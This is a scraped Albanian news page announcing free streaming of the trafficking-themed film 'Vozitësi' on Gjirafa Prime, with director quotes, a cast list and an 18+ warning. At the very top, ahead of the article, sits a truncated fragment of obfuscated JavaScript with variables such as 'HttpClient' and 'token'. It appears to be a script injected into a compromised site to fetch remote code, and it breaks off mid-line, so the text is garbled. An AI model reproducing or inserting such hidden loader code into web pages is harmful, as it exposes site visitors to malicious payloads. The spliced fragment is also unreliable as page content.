;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Filmi “Vozitësi” falas në Gjirafa Prime

By

Sot nga ora 18:00 në Prime të gjirafaVideos është lansuar filmi “Vozitësi” për hir të kauzës të mbrojmë vajzat dhe gratë.

Filmi është i mbështetur nga Qendra Kinematografike e Kosovës, me producent Kreshnik Berisha dhe regjisor Valter Lucaj.

“Vozitësi” trajton çështjen e përdhunimit dhe trafikimit të vajzave ku shoferi i dy trafikuesve të qenieve njerëzore përfundon pa dijeninë duke ndihmuar klientët e tij për ta përzënë vajzën e tij të rrëmbyer jashtë vendit.

Çështja se “çka nuk më prek mua në familje nuk është problem i imi” është i trajtuar me shumë finesë dhe delikatesë. Në fund filmi të dhuron ndjenjën e ngulfatjes pasi që është një pasqyrë që shfaqë anën e errët të shoqërisë.

 

Regjsori i filmit Valter Lucaj është shprehur që “situata që është krijuar në vend nga rasti i fundit është trishtuese dhe na ka shokuar që të gjithë prandaj bashkë me producentin dhe gjirafaVideo vendosëm që filmin t’a shfaqim pa pagesë për një periudhë të caktuar, në menyrë që të ndikojmë në vetdijësimin e audiencës.

 

Këtë film e kemi punuar me shumë kujdes dhe me një dashni të vecantë pasi që temën të cilën e trajton është shumë e ndjeshme dhe nuk ka qenë fare e lehtë për asnjërin pjesëtarë të ekipit.

 

Storia e filmit është rrënqethëse por edhe ngulfatëse ku aktorët kanë dhënë më të mirën nga vetja dhe performanca e tyre ka bërë që filmi t’a percojë atë emocion.”

Në film kanë luajtur Astrit Kabashi, Adriana Matoshi, Kaona Sylejmani, Agron Shala, Valmir Krasniqi, Rinesa Qeriqi dhe Gjergj Uka.

Filmin mund t’a shihni pa pagesë në kategorinë gjirafaPrime në platformën gjirafaVideo deri më 30 Shtator.

Kujdes filmi përmban skena të rënda dhe është për moshën 18+

Filmi mund të shikohet vetëm në territoret: Kosovë, Shqipëri dhe Maqedoni e Veriut.

Artikuj të ngjashëm